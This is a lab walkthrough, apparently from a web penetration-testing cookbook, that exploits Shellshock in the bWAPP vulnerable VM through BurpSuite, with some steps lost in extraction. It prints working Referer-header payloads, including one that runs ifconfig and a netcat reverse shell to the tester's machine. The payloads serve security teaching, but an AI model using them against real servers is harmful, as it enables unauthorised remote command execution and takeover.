Shellshock (also called Bashdoor) is a bug that was discovered in the Bash shell in September 2014, allowing the execution of commands through functions stored in the values of environment variables.
Shellshock is relevant to us as web penetration testers because developers sometimes use calls to system commands in PHP and CGI scripts—more commonly in CGI—and these scripts may make use of system environment variables.
In this recipe, we will exploit a Shellshock vulnerability in the Bee-box-vulnerable virtual machine to gain command of execution on the server.
http://192.168.56.103/bWAPP/
.In the text, we can see something interesting: Current user: www-data. This may mean that the page is using system calls to get the username. It also gives us a hint: Attack the referrer.
We can see that there is an iframe
calling a shell script: ./cgi-bin/shellshock.sh
, which might be the script vulnerable to Shellshock.
shellshock.sh
so we first need to configure BurpSuite to intercept server responses. Go to Options in the Proxy tab and check the box with the text Intercept responses based on the following rules:shellshock.php
./bWAPP/cgi-bin/shellshock.sh
. Then, replace the Referer
with:() { :;}; echo "Vulnerable:"
.ttf
file and then we should get the response from shellshock.sh
, as shown:The response now has a new header parameter called Vulnerable
. This is because it integrated the output of the echo
command to the HTML header so we can take this further.
() { :;}; echo "Vulnerable:" $(/bin/sh -c "/sbin/ifconfig")
nc -vlp 12345
shellshock.sh
, right-click on it and send it to Repeater, as illustrated:() { :;}; echo "Vulnerable:" $(/bin/sh -c "nc -e /bin/bash 192.168.56.1 12345")
In this case, 192.168.56.1 is the address of our Kali machine.
In the first five steps, we discovered that there was a call to a shell script and, as it should have been run by a shell interpreter, it may have been bash or a vulnerable version of bash. To verify that, we performed the following test:
() { :;}; echo "Vulnerable:"
The first part () { :;};
is an empty function definition since bash can store functions as environment variables and this is the core of the vulnerability, as the parser keeps interpreting (and executing) the commands after the function ends which allows us to issue the second part echo "Vulnerable:"
which is a command that simply returns echoes, what it is given as input.
The vulnerability occurs in the web server because the CGI implementation maps all the parts of a request to environment variables so this attack also works if done over User-Agent or Accept-Language instead of Referer.
Once we knew the server was vulnerable, we issued a test command ifconfig
and set up a reverse shell.
A reverse shell is a remote shell that has the particular characteristic of being initiated by the victim computer so that the attacker listens for a connection instead of the server waiting for a client to connect as in a bind connection.
Once we have a shell to the server, we need to escalate privileges and get the information needed to help with our penetration test.
Shellshock affected a huge number of servers and devices all around the world and there is a variety of ways to exploit it, for example, the Metasploit Framework includes a module to set up a DHCP server to inject commands on the clients that connect to it; this is very useful in a network penetration test in which we have mobile devices connected to the LAN (https://www.rapid7.com/db/modules/auxiliary/server/dhclient_bash_env).
3.137.217.220